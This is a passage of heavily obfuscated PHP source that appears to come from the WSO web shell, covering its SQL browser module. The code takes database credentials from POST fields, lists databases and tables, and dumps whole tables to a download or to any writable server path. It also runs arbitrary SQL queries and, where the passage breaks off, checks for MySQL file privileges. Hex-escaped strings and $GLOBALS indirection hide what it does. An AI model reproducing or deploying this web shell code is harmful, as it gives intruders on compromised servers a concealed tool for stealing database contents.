$ykwbodcd = "sql";
$wqbpixdcuh = "f\x70";
if (${${"\x47L\x4fBAL\x53"}["sd\x69\x67td\x67ih"]}) {
$prlzshyyi = "\x73ql";
$jotets = "t\x61b\x6c\x65";
${$prlzshyyi} .= "\x49NSE\x52T \x49NT\x4f \x60" . ${$jotets} . "` (" . implode(",\x20", ${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["ame\x68\x74\x67"]}) . ") \x56\x41L\x55\x45S\x20\n\t(" . implode(",\x20", ${${"\x47\x4cO\x42\x41L\x53"}["b\x64m\x71\x77\x71v\x66\x71\x6e"]}) . ")";
${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["s\x64\x69\x67\x74\x64\x67\x69h"]} = false;
} else
${$xobgpipr} .= "\n\t,(" . implode(", ", ${${"\x47LO\x42\x41L\x53"}["\x62dmqw\x71\x76\x66\x71n"]}) . ")";
if (${$wqbpixdcuh})
fwrite(${${"\x47\x4c\x4f\x42\x41L\x53"}["\x74\x62\x72\x68\x71b\x69"]}, ${$ykwbodcd});
else
echo (${${"\x47\x4cO\x42\x41\x4c\x53"}["lwqr\x69o"]});
${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x63lk\x75\x79\x6f\x6aj"]}++;
}
if (!${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x73\x64\x69\x67\x74\x64\x67ih"]}) {
$gitelgqh = "\x66\x70";
$dhwspxr = "\x66p";
if (${$gitelgqh})
fwrite(${$dhwspxr}, "\x3b\n\n");
else
echo ("\x3b\n\n");
}
break;
case "pgs\x71\x6c":
$this->query("SELE\x43T * \x46\x52OM " . ${${"\x47L\x4fBALS"}["t\x78yj\x6d\x79\x77p"]});
while (${${"\x47\x4c\x4f\x42\x41L\x53"}["q\x76\x62\x6b\x62\x70\x69\x64x\x63"]} = $this->fetch()) {
$dijwkkaxtwh = "\x76";
${"G\x4cO\x42\x41\x4c\x53"}["j\x77c\x67\x6c\x6d\x69y\x74\x6akt"] = "\x63o\x6c\x75m\x6e\x73";
${"\x47\x4c\x4f\x42\x41L\x53"}["\x6b\x71\x6cgw\x69\x77\x68g"] = "\x69t\x65m";
${"\x47\x4c\x4f\x42AL\x53"}["ick\x6a\x69f\x7a\x66"] = "fp";
${"\x47\x4cO\x42AL\x53"}["\x62\x68\x6csy\x63\x63\x6db"] = "\x73ql";
${"\x47LO\x42A\x4c\x53"}["\x72q\x64\x71\x76\x72t"] = "sq\x6c";
${"\x47LOB\x41\x4cS"}["\x67\x62\x6e\x73\x6c\x64"] = "\x69\x74\x65\x6d";
${"G\x4c\x4f\x42A\x4c\x53"}["\x6e\x74\x6dqv\x71y"] = "\x74\x61b\x6c\x65";
${${"\x47L\x4fBALS"}["\x61m\x65\x68t\x67"]} = array();
foreach (${${"GL\x4f\x42\x41L\x53"}["\x67\x62\x6es\x6c\x64"]} as ${${"\x47\x4c\x4f\x42ALS"}["o\x71vr\x79\x78\x65"]} => ${$dijwkkaxtwh}) {
$xtthgqq = "\x6b";
${"\x47\x4c\x4fB\x41\x4cS"}["\x69m\x72\x6d\x6f\x69\x61c"] = "\x6b";
${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x62d\x6d\x71\x77\x71\x76\x66\x71n"]}[${$xtthgqq}] = "'" . addslashes(${${"\x47\x4c\x4f\x42A\x4cS"}["\x76v\x64x\x6dj\x62\x67\x65\x63"]}) . "'";
${${"GL\x4fB\x41L\x53"}["a\x6d\x65\x68\x74\x67"]}[] = ${${"\x47L\x4fBA\x4cS"}["im\x72\x6d\x6f\x69\x61\x63"]};
}
${${"G\x4cO\x42\x41LS"}["\x62h\x6c\x73y\x63\x63\x6d\x62"]} = "\x49N\x53\x45RT\x20I\x4e\x54\x4f\x20" . ${${"\x47LOB\x41L\x53"}["n\x74\x6dq\x76\x71\x79"]} . " (" . implode(",\x20", ${${"\x47L\x4f\x42A\x4cS"}["j\x77c\x67\x6cm\x69\x79t\x6a\x6b\x74"]}) . ") \x56A\x4cU\x45S (" . implode(", ", ${${"G\x4cOBA\x4c\x53"}["\x6bq\x6c\x67\x77i\x77\x68\x67"]}) . ");" . "\n";
if (${${"G\x4cOB\x41L\x53"}["t\x62\x72h\x71bi"]})
fwrite(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["i\x63kji\x66zf"]}, ${${"G\x4cO\x42AL\x53"}["lwq\x72\x69\x6f"]});
else
echo (${${"GL\x4fB\x41\x4cS"}["\x72\x71\x64\x71\x76rt"]});
}
break;
}
return false;
}
}
${${"\x47\x4c\x4fBA\x4cS"}["\x62o\x70\x6dw\x65\x6a\x67\x69\x72\x66"]} = new DbClass7($_POST["\x74\x79\x70e"]);
if ((@$_POST["\x702"] == "d\x6f\x77\x6e\x6c\x6f\x61\x64") && (@$_POST["p\x31"] != "sel\x65ct")) {
$db->connect($_POST["s\x71l\x5f\x68ost"], $_POST["s\x71l\x5flo\x67in"], $_POST["sq\x6c\x5fp\x61ss"], $_POST["sql_base"]);
$db->selectdb($_POST["sq\x6c\x5fb\x61\x73e"]);
switch ($_POST["\x63\x68\x61r\x73\x65\x74"]) {
case "\x57\x69nd\x6fws-\x312\x351":
$db->setCharset("c\x70\x31\x32\x351");
break;
case "\x55\x54\x46-\x38":
$db->setCharset("\x75tf\x38");
break;
case "KOI8-\x52":
$db->setCharset("k\x6fi\x38\x72");
break;
case "\x4b\x4fI8-U":
$db->setCharset("\x6b\x6fi\x38\x75");
break;
case "c\x708\x36\x36":
$db->setCharset("cp8\x366");
break;
}
if (empty($_POST["\x66\x69\x6c\x65"])) {
ob_start("ob_g\x7ah\x61\x6ed\x6cer", 4096);
header("\x43o\x6e\x74\x65nt-\x44\x69s\x70o\x73i\x74\x69on:\x20a\x74\x74a\x63\x68m\x65n\x74;\x20\x66i\x6cenam\x65\x3dd\x75\x6dp.sq\x6c");
header("C\x6fnt\x65\x6e\x74-\x54y\x70e:\x20\x74e\x78\x74/p\x6c\x61i\x6e");
foreach ($_POST["\x74bl"] as ${${"\x47L\x4fB\x41\x4c\x53"}["\x76\x76d\x78\x6dj\x62\x67\x65\x63"]})
$db->dump(${${"\x47\x4cO\x42A\x4c\x53"}["vvd\x78\x6d\x6abg\x65c"]});
exit;
} elseif (${${"\x47L\x4fB\x41\x4c\x53"}["t\x62r\x68\x71\x62i"]} = @fopen($_POST["\x66\x69l\x65"], "\x77")) {
${"\x47L\x4f\x42\x41L\x53"}["\x69\x67\x77\x6e\x63\x75wl\x6ah\x63\x78"] = "\x76";
$azcjoee = "\x66\x70";
foreach ($_POST["\x74\x62\x6c"] as ${${"\x47L\x4fB\x41\x4c\x53"}["\x69\x67\x77nc\x75wl\x6a\x68\x63\x78"]})
$db->dump(${${"\x47L\x4f\x42A\x4c\x53"}["vv\x64\x78\x6d\x6ab\x67e\x63"]}, ${$azcjoee});
fclose(${${"GLOB\x41\x4cS"}["\x74\x62\x72h\x71b\x69"]});
unset($_POST["\x702"]);
} else
die("\x3c\x73cr\x69p\x74\x3eal\x65\x72t(\"E\x72\x72\x6fr\x21\x20Ca\x6e'\x74\x20o\x70\x65n \x66\x69\x6c\x65\")\x3b\x77\x69\x6e\x64o\x77\x2e\x68\x69\x73\x74\x6fr\x79\x2eba\x63k(-1)\x3c/\x73cr\x69\x70t\x3e");
}
WebShellOrbHeader();
echo "\n<\x681\x3eS\x71\x6c\x20b\x72owser</h\x31><\x64\x69\x76\x20\x63las\x73=cont\x65\x6et>\n<form\x20\x6e\x61m\x65=\x27\x73f\x27 \x6d\x65tho\x64=\x27p\x6f\x73\x74\x27 o\x6e\x73u\x62m\x69\x74\x3d\x27\x66\x73(th\x69\x73)\x3b\x27\x3e\x3cta\x62\x6ce c\x65llp\x61\x64\x64\x69ng\x3d\x272\x27 cell\x73\x70\x61\x63\x69\x6eg='\x30\x27><\x74r\x3e\n\x3ct\x64>\x54\x79p\x65</t\x64\x3e<td>H\x6fs\x74</t\x64\x3e<td\x3e\x4c\x6fg\x69\x6e</t\x64>\x3c\x74\x64>\x50a\x73s\x77o\x72d</t\x64\x3e\x3ct\x64>D\x61t\x61\x62\x61\x73\x65</t\x64\x3e\x3c\x74\x64>\x3c/\x74d\x3e</\x74r><tr>\n\x3c\x69\x6e\x70\x75t\x20ty\x70\x65=\x68\x69\x64den \x6ea\x6de=a \x76a\x6cu\x65=Sql>\x3c\x69\x6ep\x75\x74 ty\x70\x65=h\x69\x64\x64\x65n\x20\x6eam\x65=\x70\x31 v\x61\x6c\x75e=\x27q\x75\x65ry'>\x3ci\x6e\x70u\x74 \x74ype=hi\x64\x64\x65\x6e\x20na\x6de\x3dp2\x20v\x61\x6cu\x65\x3d\x27'>\x3ci\x6e\x70\x75\x74 ty\x70\x65=\x68id\x64en\x20\x6e\x61m\x65\x3dc \x76al\x75\x65\x3d\x27" . htmlspecialchars($GLOBALS["\x63w\x64"]) . "'\x3e\x3c\x69\x6epu\x74 \x74\x79\x70e=hi\x64\x64e\x6e \x6e\x61\x6d\x65=cha\x72\x73\x65\x74\x20\x76alue=\x27" . (isset($_POST["c\x68\x61r\x73et"]) ? $_POST["charse\x74"] : "") . "\x27\x3e\n<\x74d\x3e<\x73elec\x74\x20n\x61\x6de='\x74y\x70\x65\x27><\x6fpti\x6fn\x20v\x61lue='mysq\x6c\x27\x20";
if (@$_POST["ty\x70\x65"] == "\x6d\x79\x73ql")
echo "\x73\x65\x6ce\x63t\x65d";
echo "\x3eM\x79\x53\x71l\x3c/\x6f\x70t\x69\x6f\x6e\x3e\x3co\x70\x74\x69on\x20v\x61lu\x65=\x27\x70\x67\x73ql\x27 ";
if (@$_POST["t\x79pe"] == "\x70\x67s\x71\x6c")
echo "\x73\x65l\x65\x63\x74\x65d";
echo ">Po\x73\x74\x67\x72eS\x71\x6c</\x6fpt\x69o\x6e\x3e\x3c/sele\x63t>\x3c/\x74d>\n\x3c\x74d><\x69n\x70ut\x20\x74y\x70\x65\x3d\x74\x65\x78\x74\x20\x6e\x61m\x65\x3dsql_h\x6f\x73\x74\x20value=\x22" . (empty($_POST["\x73\x71l_\x68\x6fst"]) ? "\x6c\x6fca\x6chost" : htmlspecialchars($_POST["s\x71\x6c\x5f\x68\x6f\x73t"])) . "\x22>\x3c/\x74\x64>\n\x3ct\x64>\x3c\x69\x6epu\x74 \x74\x79pe\x3d\x74e\x78\x74\x20n\x61me\x3dsql\x5f\x6c\x6f\x67\x69\x6e\x20v\x61\x6cue=\x22" . (empty($_POST["\x73\x71l\x5fl\x6f\x67\x69n"]) ? "\x72o\x6ft" : htmlspecialchars($_POST["s\x71l\x5f\x6c\x6fg\x69\x6e"])) . "\"\x3e\x3c/t\x64>\n<t\x64>\x3c\x69\x6e\x70u\x74\x20type=te\x78t n\x61m\x65=\x73\x71l_\x70\x61\x73\x73\x20val\x75e\x3d\"" . (empty($_POST["\x73\x71\x6c\x5f\x70as\x73"]) ? "" : htmlspecialchars($_POST["sql\x5fpa\x73s"])) . "\x22>\x3c/\x74\x64\x3e\x3c\x74\x64\x3e";
${${"G\x4c\x4f\x42\x41\x4c\x53"}["e\x63\x62\x63\x6d\x69\x79\x62ue"]} = "<\x69\x6e\x70\x75\x74\x20t\x79p\x65\x3d\x74ext \x6ea\x6d\x65=\x73\x71\x6c_b\x61\x73e \x76al\x75\x65\x3d'\x27\x3e";
if (isset($_POST["\x73ql\x5fh\x6fst"])) {
${"G\x4c\x4f\x42ALS"}["\x68\x6f\x6a\x7an\x77\x68na\x63\x70\x66"] = "\x74\x6dp";
if ($db->connect($_POST["sq\x6c_h\x6f\x73\x74"], $_POST["s\x71\x6c\x5f\x6c\x6f\x67\x69n"], $_POST["\x73\x71l\x5fp\x61\x73s"], $_POST["s\x71l_\x62\x61\x73\x65"])) {
switch ($_POST["\x63h\x61r\x73\x65\x74"]) {
case "Wi\x6e\x64\x6f\x77\x73-12\x351":
$db->setCharset("\x63p\x31251");
break;
case "UT\x46-8":
$db->setCharset("\x75\x74f8");
break;
case "\x4b\x4fI\x38-\x52":
$db->setCharset("\x6boi\x38\x72");
break;
case "K\x4fI\x38-\x55":
$db->setCharset("k\x6f\x698u");
break;
case "cp\x386\x36":
$db->setCharset("\x63\x70866");
break;
}
$db->listDbs();
echo "\x3cs\x65l\x65\x63\x74 na\x6d\x65=\x73\x71\x6c\x5fb\x61se\x3e<op\x74io\x6e valu\x65=\x27\x27></o\x70\x74ion\x3e";
while (${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x62\x64\x6dq\x77\x71\x76fq\x6e"]} = $db->fetch()) {
$vutoobappnb = "\x69\x74em";
${"\x47\x4cOB\x41LS"}["dh\x6e\x71\x6b\x65\x79"] = "\x76a\x6c\x75e";
$dtvsszkh = "\x6b\x65\x79";
list(${$dtvsszkh}, ${${"G\x4c\x4fB\x41\x4c\x53"}["x\x72d\x62\x6ex\x66mv\x74"]}) = each(${$vutoobappnb});
echo "<op\x74\x69\x6fn v\x61l\x75\x65=\x22" . ${${"\x47L\x4f\x42ALS"}["\x78r\x64\x62n\x78\x66\x6d\x76\x74"]} . "\x22\x20" . (${${"G\x4c\x4f\x42A\x4c\x53"}["x\x72\x64\x62n\x78\x66m\x76\x74"]} == $_POST["\x73q\x6c_b\x61s\x65"] ? "se\x6c\x65\x63t\x65d" : "") . "\x3e" . ${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x64\x68n\x71\x6be\x79"]} . "</\x6f\x70tion\x3e";
}
echo "</select>";
} else
echo ${${"GL\x4f\x42ALS"}["\x68\x6f\x6a\x7a\x6e\x77\x68\x6ea\x63pf"]};
} else
echo ${${"G\x4cOB\x41\x4cS"}["ec\x62\x63\x6di\x79b\x75e"]};
echo "\x3c/t\x64>\n\t\t\t\t<t\x64><\x69\x6e\x70u\x74 \x74\x79p\x65=sub\x6dit valu\x65=\x27\x3e\x3e\x27 o\x6e\x63l\x69\x63\x6b='fs(d\x2e\x73\x66);\x27></td>\n\x20\x20 \x20\x20\x20\x20\x20 \x20 \x20<t\x64\x3e<\x69\x6e\x70ut\x20t\x79\x70\x65\x3d\x63\x68\x65\x63\x6b\x62ox nam\x65=s\x71\x6c\x5fc\x6funt\x20\x76\x61lue=\x27o\x6e\x27" . (empty($_POST["sql_c\x6f\x75\x6e\x74"]) ? "" : "\x20c\x68e\x63k\x65\x64") . ">\x20\x63o\x75\x6et\x20th\x65\x20\x6eu\x6dbe\x72\x20\x6f\x66\x20rows\x3c/td\x3e\n\t\t\t\x3c/\x74\x72>\n\t\t</\x74a\x62\x6ce\x3e\n\t\t\x3csc\x72\x69p\x74>\n\x20\x20 \x20 \x20s_db='" . @addslashes($_POST["\x73\x71l_b\x61\x73e"]) . "';\n\x20 \x20 \x20\x20 \x20\x66\x75\x6ect\x69o\x6e\x20\x66\x73(\x66)\x20{\n \x20\x20 \x20 \x20\x20\x20\x20 \x69\x66(f.\x73\x71l\x5f\x62ase\x2eva\x6c\x75e!=\x73_\x64\x62)\x20{ \x66\x2eons\x75\x62\x6d\x69t\x20\x3d f\x75n\x63ti\x6f\x6e()\x20{};\n \x20 \x20\x20\x20\x20 \x20 \x20 \x20 \x20\x20\x69\x66(\x66\x2ep1) \x66\x2ep\x31\x2eval\x75e=\x27\x27;\n\x20\x20 \x20\x20\x20 \x20 \x20 \x20\x20 \x69\x66(\x66\x2e\x70\x32) f.\x70\x32.v\x61\x6c\x75e='';\n \x20\x20\x20\x20 \x20 \x20\x20\x20 \x20 \x20\x20 \x69\x66(f\x2e\x703) f\x2e\x70\x33.\x76a\x6cu\x65=\x27'\x3b\n\x20\x20 \x20 \x20\x20 \x20 \x20}\n\x20\x20\x20 \x20 \x20\x20 \x20}\n\t\t\tf\x75\x6ect\x69on\x20st(\x74,\x6c)\x20{\n\t\t\t\t\x64\x2e\x73f.\x701\x2ev\x61\x6c\x75e\x20\x3d 's\x65l\x65ct';\n\t\t\t\t\x64\x2e\x73f\x2e\x70\x32\x2e\x76\x61lue\x20= \x74;\n\x20\x20\x20\x20 \x20if(\x6c\x20\x26\x26\x20\x64.\x73f.p\x33)\x20d.\x73f\x2ep\x33.\x76al\x75\x65 =\x20l\x3b\n\t\t\t\t\x64.sf.submit();\n\t\t\t}\n\t\t\t\x66un\x63\x74\x69\x6fn\x20i\x73() {\n\t\t\t\t\x66o\x72(i=\x30;\x69<d.s\x66.e\x6cement\x73['t\x62\x6c[]'].\x6c\x65\x6e\x67\x74h;++\x69)\n\t\t\t\t\t\x64.sf.\x65\x6ce\x6dents[\x27tb\x6c[]\x27][\x69].\x63hec\x6b\x65\x64\x20=\x20\x21d\x2es\x66\x2e\x65l\x65\x6d\x65\x6et\x73['t\x62\x6c[]'][i]\x2e\x63\x68e\x63ked;\n\t\t\t}\n\t\t\x3c/sc\x72i\x70\x74>";
if (isset(${${"\x47\x4c\x4f\x42\x41LS"}["\x62\x6f\x70\x6d\x77\x65\x6a\x67ir\x66"]}) && $db->link) {
echo "<\x62r/\x3e<tabl\x65\x20\x77i\x64\x74h\x3d\x310\x30% ce\x6cl\x70\x61d\x64ing=2\x20\x63ells\x70ac\x69\x6e\x67=0\x3e";
if (!empty($_POST["\x73\x71\x6c\x5f\x62ase"])) {
$nejkldo = "\x69\x74\x65\x6d";
$db->selectdb($_POST["\x73ql\x5f\x62a\x73e"]);
echo "<tr\x3e<t\x64\x20\x77i\x64\x74\x68=1\x20\x73ty\x6c\x65\x3d'b\x6fr\x64er-\x74op:2\x70\x78\x20\x73\x6f\x6cid\x20\x2366\x36\x3b\x27><\x73\x70an\x3e\x54\x61b\x6c\x65s:</\x73pa\x6e\x3e<\x62r>\x3cb\x72\x3e";
${${"G\x4c\x4f\x42A\x4c\x53"}["\x64\x6ecw\x62\x77\x6c\x72b\x64"]} = $db->listTables();
while (${$nejkldo} = $db->fetch(${${"\x47LOB\x41\x4cS"}["dn\x63\x77\x62\x77l\x72\x62d"]})) {
${"\x47LO\x42\x41\x4c\x53"}["\x7a\x73yujl\x78\x61\x74\x70\x77"] = "\x76\x61\x6c\x75\x65";
${"GLO\x42\x41L\x53"}["\x65a\x68h\x76\x69\x67h"] = "v\x61l\x75\x65";
list(${${"\x47\x4cOBAL\x53"}["\x6f\x6f\x63wa\x62\x6f"]}, ${${"\x47\x4cO\x42A\x4cS"}["\x65\x61\x68\x68v\x69\x67\x68"]}) = each(${${"G\x4c\x4f\x42\x41L\x53"}["\x62d\x6d\x71wqv\x66\x71n"]});
if (!empty($_POST["\x73\x71\x6c_\x63o\x75\x6et"]))
${${"\x47\x4c\x4fB\x41\x4cS"}["\x6f\x6e\x6d\x64\x72\x78"]} = $db->fetch($db->query("S\x45\x4c\x45\x43T\x20\x43OUNT(*)\x20a\x73\x20\x6e\x20\x46R\x4f\x4d " . ${${"\x47L\x4f\x42\x41LS"}["x\x72db\x6ex\x66m\x76\x74"]} . ""));
${${"G\x4c\x4f\x42A\x4c\x53"}["x\x72\x64b\x6e\x78\x66m\x76\x74"]} = htmlspecialchars(${${"GL\x4f\x42A\x4c\x53"}["\x78r\x64b\x6ex\x66\x6d\x76\x74"]});
echo "\x3c\x6eo\x62\x72>\x3ci\x6e\x70ut\x20t\x79pe\x3d\x27ch\x65\x63\x6b\x62\x6f\x78\x27\x20name\x3d'\x74bl[]\x27 \x76alu\x65='" . ${${"GLOB\x41L\x53"}["x\x72d\x62\x6e\x78f\x6dvt"]} . "'>\x26\x6ebsp\x3b\x3ca hr\x65f=#\x20o\x6e\x63li\x63\x6b\x3d\x22\x73\x74(\x27" . ${${"G\x4c\x4f\x42\x41L\x53"}["x\x72d\x62\x6e\x78\x66m\x76\x74"]} . "',\x31)\x22\x3e" . ${${"G\x4cOB\x41LS"}["\x7a\x73\x79u\x6a\x6c\x78\x61\x74\x70w"]} . "\x3c/a\x3e" . (empty($_POST["\x73\x71\x6c_\x63ou\x6et"]) ? "\x26n\x62\x73\x70;" : " \x3c\x73mal\x6c>({$n['n']})</small>") . "</n\x6f\x62\x72\x3e<\x62\x72>";
}
echo "\x3cinp\x75t\x20t\x79\x70\x65\x3d'\x63h\x65ckbo\x78\x27\x20\x6f\x6e\x63l\x69ck\x3d'\x69\x73();\x27> <\x69\x6e\x70u\x74 \x74\x79p\x65\x3dbu\x74t\x6f\x6e\x20v\x61lue\x3d'\x44um\x70'\x20\x6f\x6eclick\x3d\x27documen\x74.s\x66\x2ep2.\x76alue\x3d\"\x64o\x77nlo\x61\x64\";\x64\x6f\x63u\x6d\x65\x6e\x74\x2esf\x2e\x73\x75bmit()\x3b'>\x3c\x62\x72\x3eF\x69l\x65 p\x61t\x68:<\x69\x6e\x70\x75t t\x79pe\x3d\x74\x65\x78t\x20\x6eame\x3df\x69le\x20va\x6cue\x3d'\x64um\x70.\x73q\x6c'\x3e</td>\x3ctd s\x74yle\x3d\x27b\x6frd\x65r-t\x6fp:2\x70x \x73\x6f\x6ci\x64\x20#666\x3b'\x3e";
if (@$_POST["\x701"] == "\x73\x65\x6c\x65c\x74") {
$_POST["\x701"] = "\x71ue\x72y";
${"\x47LO\x42\x41\x4c\x53"}["\x79\x63\x74\x6ar\x6c\x73\x65\x6d\x62z"] = "\x6e\x75\x6d";
${"\x47\x4c\x4f\x42\x41\x4cS"}["\x66\x79o\x6ckb"] = "\x70\x61\x67\x65\x73";
$_POST["p3"] = $_POST["\x70\x33"] ? $_POST["p\x33"] : 1;
$db->query("S\x45\x4c\x45C\x54 \x43\x4f\x55\x4eT(*) \x61s\x20\x6e\x20F\x52OM\x20" . $_POST["\x702"]);
${"G\x4c\x4f\x42A\x4c\x53"}["k\x6a\x62\x6b\x7ae\x6b\x79\x7a\x6b\x6b"] = "pa\x67\x65s";
${${"G\x4cO\x42\x41\x4c\x53"}["\x79ct\x6ar\x6c\x73\x65mb\x7a"]} = $db->fetch();
${"\x47\x4c\x4fB\x41\x4cS"}["\x72\x62\x66\x6b\x66a\x77\x77\x6c\x70"] = "\x6e\x75\x6d";
${${"G\x4cO\x42\x41\x4cS"}["k\x6abk\x7a\x65\x6by\x7a\x6bk"]} = ceil(${${"G\x4cO\x42\x41\x4cS"}["\x72b\x66\x6bf\x61w\x77\x6c\x70"]}["\x6e"] / 30);
echo "\x3c\x73c\x72\x69p\x74>d\x2es\x66.o\x6e\x73ub\x6d\x69t\x3dfu\x6ectio\x6e(){st(\x22" . $_POST["\x70\x32"] . "\x22, d.sf.p3.\x76\x61lue)}\x3c/s\x63\x72\x69\x70\x74><sp\x61n\x3e" . $_POST["\x70\x32"] . "</sp\x61n\x3e\x20({$num['n']} re\x63\x6f\x72\x64s) \x50a\x67e # \x3c\x69n\x70u\x74\x20\x74yp\x65=\x74e\x78\x74 \x6ea\x6d\x65=\x27p\x33'\x20v\x61\x6c\x75\x65=" . ((int) $_POST["p3"]) . ">";
echo " \x6ff\x20$pages";
if ($_POST["p\x33"] > 1)
echo " <a \x68r\x65f\x3d\x23\x20\x6fn\x63l\x69\x63\x6b=\x27st(\x22" . $_POST["p\x32"] . "\", " . ($_POST["p\x33"] - 1) . ")'>\x26\x6ct\x3b\x20Prev</a\x3e";
if ($_POST["p\x33"] < ${${"\x47\x4c\x4f\x42\x41L\x53"}["\x66\x79o\x6c\x6bb"]})
echo "\x20<a\x20h\x72\x65\x66\x3d# on\x63l\x69\x63k\x3d\x27\x73t(\x22" . $_POST["\x702"] . "\",\x20" . ($_POST["p\x33"] + 1) . ")'\x3eN\x65\x78\x74 &g\x74\x3b\x3c/\x61>";
$_POST["p\x33"]--;
if ($_POST["\x74\x79\x70\x65"] == "pg\x73\x71\x6c")
$_POST["\x70\x32"] = "SE\x4c\x45\x43T\x20*\x20F\x52\x4fM " . $_POST["p\x32"] . "\x20L\x49\x4d\x49\x54\x2030\x20OFF\x53ET " . ($_POST["p3"] * 30);
else
$_POST["p\x32"] = "\x53E\x4c\x45\x43\x54\x20*\x20F\x52\x4f\x4d\x20`" . $_POST["\x70\x32"] . "\x60\x20\x4cIMI\x54 " . ($_POST["\x703"] * 30) . ",\x330";
echo "<\x62r><\x62r>";
}
if ((@$_POST["\x701"] == "qu\x65r\x79") && !empty($_POST["p\x32"])) {
$db->query(@$_POST["\x702"]);
if ($db->res !== false) {
$qkoefjgtvmo = "li\x6ee";
$ofantutk = "\x69\x74\x65m";
${${"\x47L\x4fBAL\x53"}["\x67\x6cetwnsp\x6an\x74\x64"]} = false;
echo "\x3ctabl\x65 wi\x64\x74h\x3d\x310\x30\x25\x20\x63\x65\x6cl\x73p\x61\x63ing\x3d1 \x63ell\x70\x61d\x64\x69\x6e\x67\x3d\x32\x20cl\x61\x73\x73=main s\x74\x79\x6c\x65=\x22b\x61\x63kgro\x75\x6e\x64-color:\x23\x32\x392\x39\x329\x22\x3e";
${$qkoefjgtvmo} = 1;
while (${$ofantutk} = $db->fetch()) {
${"\x47\x4c\x4f\x42\x41\x4cS"}["\x67\x70b\x70qso\x6br"] = "t\x69\x74\x6c\x65";
if (!${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x67p\x62\x70\x71s\x6fk\x72"]}) {
$kmifpskdrsr = "\x69\x74\x65\x6d";
$cmpvdluse = "t\x69\x74\x6c\x65";
$gldaewbitzp = "va\x6c\x75\x65";
${"\x47\x4c\x4fB\x41LS"}["p\x71\x78\x67kwx\x6a\x75\x6a\x61"] = "it\x65m";
${"\x47L\x4fB\x41\x4cS"}["\x75\x79\x64j\x61\x68h\x6d\x64t\x6a"] = "\x6b\x65\x79";
echo "\x3c\x74r\x3e";
foreach (${$kmifpskdrsr} as ${${"\x47L\x4f\x42\x41\x4c\x53"}["o\x6f\x63\x77\x61\x62\x6f"]} => ${$gldaewbitzp})
echo "<t\x68\x3e" . ${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x75\x79\x64\x6a\x61\x68\x68m\x64\x74\x6a"]} . "</\x74h>";
reset(${${"\x47L\x4f\x42ALS"}["p\x71x\x67kw\x78j\x75\x6aa"]});
${$cmpvdluse} = true;
echo "</t\x72\x3e<\x74r\x3e";
${${"\x47\x4c\x4f\x42\x41L\x53"}["o\x6d\x61\x6exf\x72\x6fpl"]} = 2;
}
${"G\x4c\x4fB\x41LS"}["\x6a\x6c\x75\x62w\x75\x66p\x6e\x69a"] = "\x69t\x65\x6d";
$xxrzgvkzrf = "k\x65\x79";
echo "\x3c\x74\x72\x20clas\x73=\x22\x6c" . ${${"\x47L\x4f\x42A\x4c\x53"}["o\x6d\x61\x6e\x78f\x72\x6f\x70\x6c"]} . "\x22\x3e";
${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x6fma\x6exf\x72op\x6c"]} = ${${"\x47\x4c\x4fB\x41\x4cS"}["\x6fma\x6e\x78f\x72\x6fp\x6c"]} == 1 ? 2 : 1;
foreach (${${"\x47\x4c\x4f\x42AL\x53"}["\x6al\x75\x62w\x75\x66p\x6ei\x61"]} as ${$xxrzgvkzrf} => ${${"\x47\x4c\x4f\x42AL\x53"}["\x78r\x64bn\x78\x66\x6d\x76t"]}) {
if (${${"\x47\x4c\x4f\x42AL\x53"}["x\x72\x64\x62\x6e\x78\x66mv\x74"]} == null)
echo "<\x74\x64>\x3ci>\x6eu\x6cl</i\x3e\x3c/td>";
else
echo "<t\x64\x3e" . nl2br(htmlspecialchars(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x72d\x62n\x78\x66m\x76t"]})) . "\x3c/td>";
}
echo "</t\x72>";
}
echo "</ta\x62le\x3e";
} else {
echo "\x3c\x64i\x76\x3e<b>\x45\x72r\x6f\x72:\x3c/\x62>\x20" . htmlspecialchars($db->error()) . "\x3c/\x64\x69\x76>";
}
}
echo "\x3cbr\x3e\x3c/\x66o\x72\x6d><\x66or\x6d o\x6e\x73ub\x6d\x69t=\x27\x64\x2e\x73f\x2ep1.val\x75\x65\x3d\"\x71uer\x79\"\x3bd.s\x66.\x702.v\x61l\x75\x65=this\x2equ\x65ry.\x76\x61lu\x65\x3b\x64\x6fcumen\x74\x2esf.\x73\x75b\x6d\x69t();r\x65\x74u\x72n\x20fa\x6cs\x65\x3b\x27>\x3c\x74e\x78\x74a\x72\x65a\x20n\x61\x6d\x65='que\x72\x79\x27 s\x74\x79\x6ce=\x27\x77\x69dt\x68:100%;hei\x67ht:1\x300p\x78\x27>";
if (!empty($_POST["\x702"]) && ($_POST["p1"] != "\x6c\x6fadf\x69le"))
echo htmlspecialchars($_POST["\x702"]);
echo "\x3c/\x74\x65\x78\x74\x61\x72\x65\x61\x3e<br/><\x69\x6ep\x75\x74\x20\x74\x79pe\x3d\x73u\x62\x6dit v\x61\x6cu\x65\x3d'E\x78ec\x75\x74\x65\x27\x3e";
echo "\x3c/\x74\x64\x3e</\x74r\x3e";
}
echo "\x3c/t\x61\x62\x6ce></for\x6d>\x3c\x62\x72/\x3e";
if ($_POST["ty\x70e"] == "my\x73\x71l") {
$db->query("\x53\x45\x4cECT\x20\x31\x20FR\x4fM\x20\x6d\x79\x73ql\x2eu\x73\x65r WH\x45RE c\x6f\x6ecat(\x60us\x65r\x60, \x27\x40\x27,\x20`\x68\x6fs\x74`)\x20=\x20\x55SE\x52()\x20\x41ND \x60\x46\x69\x6c\x65\x5f\x70\x72\x69\x76\x60 =\x20\x27\x79\x27");
if ($db->fetch())
